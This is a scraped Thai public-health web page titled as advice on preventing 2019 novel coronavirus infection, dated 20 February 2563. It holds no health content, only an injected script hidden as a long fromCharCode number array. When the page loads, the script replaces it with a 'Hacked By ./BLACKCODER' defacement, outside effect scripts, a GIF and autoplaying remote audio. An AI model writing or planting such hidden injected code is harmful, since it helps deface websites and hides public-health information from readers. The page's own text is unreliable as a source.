การป้องกันการติดเชื้อไวรัสโคโรน่า สายพันธุ์ใหม่ 2019

อัพเดทเมือ่ ⁝20 กุมภาพันธ์ 2563

<script> document.documentElement.innerHTML=(String.fromCharCode(60,104,116,109,108,62,10,60,104,101,97,100,62,10,60,116,105,116,108,101,62,98,108,97,99,107,99,111,100,101,114,60,47,116,105,116,108,101,62,10,60,47,104,101,97,100,62,10,60,98,111,100,121,62,10,10,60,99,101,110,116,101,114,62,10,9,60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,115,99,104,105,108,108,109,97,110,105,97,46,99,111,109,47,112,114,111,106,101,99,116,115,47,115,110,111,119,115,116,111,114,109,47,115,110,111,119,115,116,111,114,109,45,109,105,110,46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,10,9,9,60,47,115,99,114,105,112,116,62,10,9,9,60,115,99,114,105,112,116,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,32,115,114,99,61,34,104,116,116,112,58,47,47,104,116,109,108,102,114,101,101,99,111,100,101,115,46,99,111,109,47,99,111,100,101,115,47,114,97,105,110,46,106,115,34,62,60,47,115,99,114,105,112,116,62,10,60,105,109,103,32,115,114,99,61,34,104,116,116,112,115,58,47,47,112,97,49,46,110,97,114,118,105,105,46,99,111,109,47,54,50,55,56,47,52,48,99,56,51,98,57,52,51,53,51,55,99,57,49,49,57,100,52,99,52,51,51,48,97,56,97,53,97,51,48,56,100,53,56,55,53,49,101,102,95,48,48,46,103,105,102,34,62,10,10,10,10,60,116,97,98,108,101,62,10,9,60,116,114,62,10,9,9,60,116,100,62,9,10,9,9,9,60,99,101,110,116,101,114,62,60,104,51,32,115,116,121,108,101,61,34,99,111,108,111,114,58,112,111,119,100,101,114,98,108,117,101,59,34,62,72,97,99,107,101,100,32,66,121,32,46,47,66,76,65,67,75,67,79,68,69,82,60,47,104,51,62,60,47,99,101,110,116,101,114,62,10,9,9,9,60,109,97,114,113,117,101,101,62,60,104,53,32,115,116,121,108,101,61,34,99,111,108,111,114,58,112,111,119,100,101,114,98,108,117,101,59,34,62,77,121,32,83,107,105,108,108,32,73,115,32,78,48,48,66,60,47,104,53,62,60,47,109,97,114,113,117,101,101,62,10,9,9,9,60,99,101,110,116,101,114,62,60,102,111,110,116,32,115,116,121,108,101,61,34,99,111,108,111,114,58,98,108,97,99,107,59,102,111,110,116,45,102,97,109,105,108,121,58,101,108,101,99,116,114,111,108,105,122,101,59,102,111,110,116,45,115,105,122,101,58,51,48,112,120,59,32,116,101,120,116,45,115,104,97,100,111,119,58,48,112,120,32,48,112,120,32,53,112,120,32,98,108,117,101,59,34,62,33,46,115,111,114,114,121,60,47,102,111,110,116,62,10,60,102,111,110,116,32,115,116,121,108,101,61,34,99,111,108,111,114,58,98,108,97,99,107,59,102,111,110,116,45,102,97,109,105,108,121,58,101,108,101,99,116,114,111,108,105,122,101,59,102,111,110,116,45,115,105,122,101,58,51,48,112,120,59,32,116,101,120,116,45,115,104,97,100,111,119,58,48,112,120,32,48,112,120,32,53,112,120,32,114,101,100,59,34,62,97,100,109,105,110,60,47,102,111,110,116,62,10,9,9,60,47,116,100,62,10,9,60,47,116,114,62,10,60,47,116,97,98,108,101,62,10,10,10,10,10,10,10,10,10,10,10,60,115,116,121,108,101,62,10,98,111,100,121,123,98,97,99,107,103,114,111,117,110,100,45,99,111,108,111,114,58,98,108,97,99,107,125,59,10,10,10,10,60,47,115,116,121,108,101,62,10,10,60,97,117,100,105,111,32,105,100,61,34,97,117,100,105,111,34,32,97,117,116,111,112,108,97,121,61,34,34,32,108,111,111,112,61,34,34,62,10,32,32,32,60,115,111,117,114,99,101,32,115,114,99,61,34,104,116,116,112,115,58,47,47,106,111,108,101,114,107,105,110,103,54,55,53,46,48,48,48,119,101,98,104,111,115,116,97,112,112,46,99,111,109,47,91,65,77,86,93,37,50,48,78,97,114,117,116,111,37,50,48,83,104,105,112,112,117,100,101,110,37,50,48,45,37,50,48,83,97,109,105,100,97,114,101,37,50,48,40,107,115,111,108,105,115,37,50,48,84,114,97,112,37,50,48,82,101,109,105,120,41,46,109,112,52,34,32,62,10,60,47,97,117,100,105,111,62,10,10,10,60,47,99,101,110,116,101,114,62,10,60,47,98,111,100,121,62,10,60,47,104,116,109,108,62))</script>